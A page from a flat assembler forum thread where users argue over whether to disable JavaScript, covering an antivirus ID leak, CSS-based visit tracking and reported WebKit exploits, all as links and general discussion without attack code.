flat assembler
Message board for the users of flat assembler.

flat assembler > Heap > Why we should always disable JS (and flash)

Goto page Previous  1, 2, 3 ... , 20, 21, 22  Next
Author
Thread Post new topic Reply to topic
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
https://thehackernews.com/2019/08/kaspersky-antivirus-online-tracking.html
Quote:
"That's a bad idea because other scripts that run in the context of the website domain can access the HTML code at any time—and thus the injected Kaspersky ID. This means in plain language that any website can simply read the Kaspersky ID of the user and misuse it for tracking," the researcher says.
Post 17 Aug 2019, 06:13
View user's profile Send private message Visit poster's website Reply with quote
sleepsleep



Joined: 05 Oct 2006
Posts: 8419
Location: ˛                             ⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣Posts: 334455
Any example for non JavaScript web application that we could follow and study?
Post 17 Aug 2019, 08:15
View user's profile Send private message Reply with quote
sts-q



Joined: 29 Nov 2018
Posts: 26
Thank you for posting, revolution!
Post 17 Aug 2019, 08:50
View user's profile Send private message Visit poster's website Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
revolution wrote:
https://thehackernews.com/2019/08/kaspersky-antivirus-online-tracking.html
Quote:
"That's a bad idea because other scripts that run in the context of the website domain can access the HTML code at any time—and thus the injected Kaspersky ID. This means in plain language that any website can simply read the Kaspersky ID of the user and misuse it for tracking," the researcher says.

So, a shitty piece of software (antivirus) explicitly leaks its user ID into the context of a website. Now an attacker may find out the user uses Kaspersky software. How exciting! The vulnerability is data leakage and it is in Kaspersky software.

Even worse, being an antivirus it already has administrative privileges to intercept user browsing. But they just decide to rely on what seems easier for a “programmer” with 1 month of experience.

Imagine JS never existed. They would then have to use something like <img src="image.png?id=ABCD-EFGH-XXXX"> or an <iframe>. You can then generate <a>’s with different IDs and use CSS to detect server-side which ID’s page has been visited. It might be a bit trickier, but JS doesn’t add anything fancy here. And is not the root cause by any means.
Post 17 Aug 2019, 11:49
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
Using an img tag will direct the browser to contact a single site. Using JS all scripts from all sites linked on the page can read the HTML code and report back to multiple places.

And if CSS can be used to do the same thing then CSS also needs to be blocked or neutered or something. I haven't looked into it, but you make it sound dangerous. Do you have some links about its abilities?

It certainly isn't right that websites can have so much power over the user's browsers regardless of whether it is JS or CSS or whatever. Especially since code coming from webpages can't be audited, and every visitor can receive a different version. Some high-profile reviewer that people trust to tell them what is safe could receive perfectly neutral code, while everyone else gets weaponised code to steal their banking details. And there is the problem. It shouldn't be that we need to trust the remote site to be safe. That is wrong headed. We shouldn't have to care.

Browsers can have bugs, they then get fixed to make us safer. JS can be running without bugs, but we need to break it to make us safer.
Post 17 Aug 2019, 16:37
View user's profile Send private message Visit poster's website Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
revolution wrote:
Using JS all scripts from all sites linked on the page can read the HTML code and report back to multiple places.

revolution wrote:
Using an img tag will direct the browser to contact a single site.

But it’s the fact of the contact that matters and gives data to a third-party. If the website owner wants its pages to access another site it doesn’t matter which URL is used.

revolution wrote:
And if CSS can be used to do the same thing then CSS also needs to be blocked or neutered or something. I haven't looked into it, but you make it sound dangerous. Do you have some links about its abilities?

The idea is that you can use :visited pseudo-class to detect if the URL of the link has been accessed recently. And then there’s plenty of ways in CSS to attach an image to particular elements (say, background-image property). That’s quite enough.

revolution wrote:
It certainly isn't right that websites can have so much power over the user's browsers regardless of whether it is JS or CSS or whatever. Especially since code coming from webpages can't be audited, and every visitor can receive a different version. Some high-profile reviewer that people trust to tell them what is safe could receive perfectly neutral code, while everyone else gets weaponised code to steal their banking details. And there is the problem. It shouldn't be that we need to trust the remote site to be safe. That is wrong headed. We shouldn't have to care.

You come back to blaming websites while ignoring non-web-applications that have much higher privileges. Remember Thompson’s hack as well: how do you know your debugger shows you what there really is in the executable? how do you know your OS loads exactly the code it lets the debugger to read from disk? how do you know you don’t get tricked by a tricky piece of code that seems valid but in fact does some clever (and malicious) stuff in some corner cases? what will you do with messengers, browsers and those mobile apps “you absolutely need to install to use our service” that are allowed to retrieve arbitrary data from the Internet as well as send your data in return?

revolution wrote:
Especially since code coming from webpages can't be audited, and every visitor can receive a different version. Some high-profile reviewer that people trust to tell them what is safe could receive perfectly neutral code, while everyone else gets weaponised code to steal their banking details.

And that is exactly what happened in the case of Kaspersky antivirus. And it didn’t even involve hacking the website. But wait! We all know having antivirus software may (and does) influence the execution of other programs. Now you can avoid antiviruses which is a good idea. But from the point of view of rights required debuggers are quite the same, and there’s quite a lot of other software that might have such rights. Not even mentioning the OS itself. Man-in-the-middle is not required to be outside, it just has to be between you and the program you try to audit.

P.S. Here’s the first link in Google to get the idea: https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense

Not that CSS is just another way of detaching visual properties from actual information. There’re custom CSS' in lots of pieces of software around us, not only browsers. Should we stop using best programming practices?
Post 18 Aug 2019, 08:16
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
You come back to blaming websites while ignoring non-web-applications that have much higher privileges.
I can control privileges of native apps. They can't get past the firewall so they can't send any details about me, my data, or my system to remote parties. Also native apps can't suddenly change their behaviour after some fourth party hacks a third party iframe on a second party website from my first party browser. I can run native apps in a VM if I choose to, they can't see which other apps I run. I can examine the code, or find a trusted reviewer/auditer to examine it for me and know that what I have is the same as everyone else has. I can run them from a restricted account login.

There are many things I can do with a native apps to increase my trust in, and control over, what they can do.
Post 18 Aug 2019, 08:40
View user's profile Send private message Visit poster's website Reply with quote
sleepsleep



Joined: 05 Oct 2006
Posts: 8419
Location: ˛                             ⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣Posts: 334455
leaking started the moment we read/write through TCP,

is like you went to library, you intended to borrow some books, but you don't want anyone including library to know, but then how library could confirm it was indeed you who returned those books and you were returning them in exact quantity?
Post 18 Aug 2019, 09:23
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
sleepsleep wrote:
is like you went to library, you intended to borrow some books, but you don't want anyone including library to know, but then how library could confirm it was indeed you who returned those books and you were returning them in exact quantity?
I'm not sure how that analogy works. With data we don't borrow and return, we just make copies. We can make as many copies as we please and send them to all interested readers. We don't need to worry about getting it back. But, if the data is sensitive, we might need to worry about whether the readers have deleted their copies after they have finished with it. And we might also need to worry about the wrong/unknown parties getting copies our sensitive data.
Post 18 Aug 2019, 09:30
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
The idea is that you can use :visited pseudo-class to detect if the URL of the link has been accessed recently. And then there’s plenty of ways in CSS to attach an image to particular elements (say, background-image property). That’s quite enough.
Is this URL guessing? That is, we use CSS to try and predict which URLs the user visits/visited? It might work for common sites that use cookies, I suppose, if the URL is unchanging (msn.com) and the ID is in a cookie.

It would be very difficult to guess the AVs injected URL when the URL has a GUID type identifier.

If CSS can directly read the HTML and immediately extract anything it pleases then that would be a much larger threat than URL guessing.
Post 18 Aug 2019, 10:09
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
Yet another example of JS being used to exploit you. And in this case it was to persecute the Uyghurs, but it could have been for anything they wanted

https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html

It all started with JS. After that your owned. You didn't need to click anything, or do anything, other than visit a webpage.

Bruce Schneier also reports on this:

https://www.schneier.com/blog/archives/2019/09/massive_iphone_.html
Post 03 Sep 2019, 11:50
View user's profile Send private message Visit poster's website Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
Google Project Zero wrote:
This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.

The bug causes an out-of-bounds write to the JSC heap with controlled data.

So, it’s not that JS itself let it do the stuff, it’s just the buggy environment that fails to catch out-of-bounds errors. Having a buggy managed environment you could as well trigger it in plain C#, Java, whatever. The victim is the user who opens a webpage. The attacker is the owner of a website containing the page. But website visitor should already trust the website owner, so the victim trusts the attacker.

Imagine you have a manager person who is responsible for managing the house you live in, like, say, making sure the house is clean and the bills are paid (browser). You tell the manager (browser) to invite someone for house cleaning (to open a webpage). The cleaning company sends him someone who has just got out of jail (malicious webpage). The cleaner person (malicious webpage) tricks the manager (browser) by exploiting his trusting nature (out-of-bounds bug) into letting him come into your room and steal your money, break everything, etc. (arbitrary code execution and stuff).

Now, who’s responsible for the situation? I say that it’s not the fault of the natural language they used to communicate. Whether they spoke Spanish, Latin, Esperanto or HTML, it could still be possible to achieve the goal. You can’t avoid using the language ’cause it’s just a way to express the idea of what should be done (shown to present a webpage to the user). They could have used sign language, pictures and DMDT (direct mental data transmission).

The problem is with the trusting manager (browser) but you have explicitly allowed (and even asked) an unreliable person (buggy browser) to meet the threat (malicious webpage). It is the manager’s fault but OTOH he just performed according to your instructions and did what he could. So at the end of the day it’s your fault to trust cleaning company instead of cleaning the house yourself or making the manager wash your floors which he wasn’t taught to (browser has no information from the webpage until it downloads it).

Now you either retrieve and process all the data yourself, or you have to trust your browser to be bugless (ha-ha, cool joke!) and the website owner (cleaning company) to be responsible enough not to send bad guys to you.

So, are you willing to stop using web browsers and other software that can get and process data from the internet?
Post 04 Sep 2019, 05:35
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
But website visitor should already trust the website owner, so the victim trusts the attacker.
I don't agree with that. I can't trust any website. I don't know who controls the website, even this website. It could be a hacker that controls a website, not the person that owns the domain, or the person that own the equipment, or the person that has the admin password. Those other people might think they are in control, but some hacker might have exploited something (which is the case with the article above). So, no, there are no websites that can be trusted. The trust model is just not there. We are all strangers.


Last edited by revolution on 04 Sep 2019, 09:14; edited 1 time in total
Post 04 Sep 2019, 06:09
View user's profile Send private message Visit poster's website Reply with quote
guignol



Joined: 06 Dec 2008
Posts: 621
Location: I mean good, I know better, only us will do best
Post 04 Sep 2019, 08:08
View user's profile Send private message Reply with quote
KerimF



Joined: 23 Aug 2019
Posts: 16
Location: Aleppo-Syria
We have been taught when we were kids and we use teaching our kids now not to trust anyone who is stranger and offers something for free.

How many do we, the adults, break this advice every day? Wink
I mean, how many do we have to break it, by habit perrhaps, daily?

Fortunately, thieves are not interested in a rather empty pocket or house (as mine Very Happy ).

We like it or not; every new technology/discovery has always two faces; it could be used for the good or bad; it depends on the situation. Only dreamers (who didn't have yet enough experiences in life) believe that this natural truth could be changed someday.
Post 04 Sep 2019, 08:28
View user's profile Send private message Reply with quote
guignol



Joined: 06 Dec 2008
Posts: 621
Location: I mean good, I know better, only us will do best
Any-how, what is wrong with Ruby?


after JavaScript, anything with 'script' in the name (like SomeSkryptt), will sound as BullShit, all the same
Post 05 Sep 2019, 11:39
View user's profile Send private message Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
revolution wrote:
DimonSoft wrote:
But website visitor should already trust the website owner, so the victim trusts the attacker.
I don't agree with that. I can't trust any website. I don't know who controls the website, even this website. It could be a hacker that controls a website, not the person that owns the domain, or the person that own the equipment, or the person that has the admin password. Those other people might think they are in control, but some hacker might have exploited something (which is the case with the article above). So, no, there are no websites that can be trusted. The trust model is just not there. We are all strangers.

By running any application that accesses network you implicitly trust the application. Web browser produces its output by processing data retrieved from a website. It’s you who directs browser to that particular website. So you implicitly have to trust the website owner not to trick your browser into doing strange stuff. Just like you have to trust DOC file not to trick your MS Word into doing strange stuff.

Trust or stop using all the tech stuff.
Post 05 Sep 2019, 17:12
View user's profile Send private message Visit poster's website Reply with quote
guignol



Joined: 06 Dec 2008
Posts: 621
Location: I mean good, I know better, only us will do best
In Godd we trust.
Post 05 Sep 2019, 19:19
View user's profile Send private message Reply with quote
KerimF



Joined: 23 Aug 2019
Posts: 16
Location: Aleppo-Syria
Quote:

Trust or stop using all the tech stuff.

Actually, it is not about 'trust'. It is about the necessity of obedience.

Based on my observations, it seems to me that this is life since always.
Only the tools in the world's masters/slaves games evolve with time.

The good news is that most people around the world don't mind joining and even enjoy most of these games (some are international now).
Meanwhile the most powerful rich Elite around the world keep investing, under or above the table, in developing better tools... for a brighter future Confused

Isn't it a wonderful world Very Happy
Post 05 Sep 2019, 22:03
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
Web browser produces its output by processing data retrieved from a website. It’s you who directs browser to that particular website. So you implicitly have to trust the website owner not to trick your browser into doing strange stuff. Just like you have to trust DOC file not to trick your MS Word into doing strange stuff.
I don't have to trust any website not to trick me or my browser. I can choose not to run their malware laced JS, I don't have to trust it. I can choose not to view booby-trapped images, I don't have to trust them. I can choose to not allow random apps like Word to access the Internet, I don't have to trust it.
Post 05 Sep 2019, 22:26
View user's profile Send private message Visit poster's website Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page Previous  1, 2, 3 ... , 20, 21, 22  Next

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Copyright © 1999-2019, Tomasz Grysztar.

Powered by rwasa.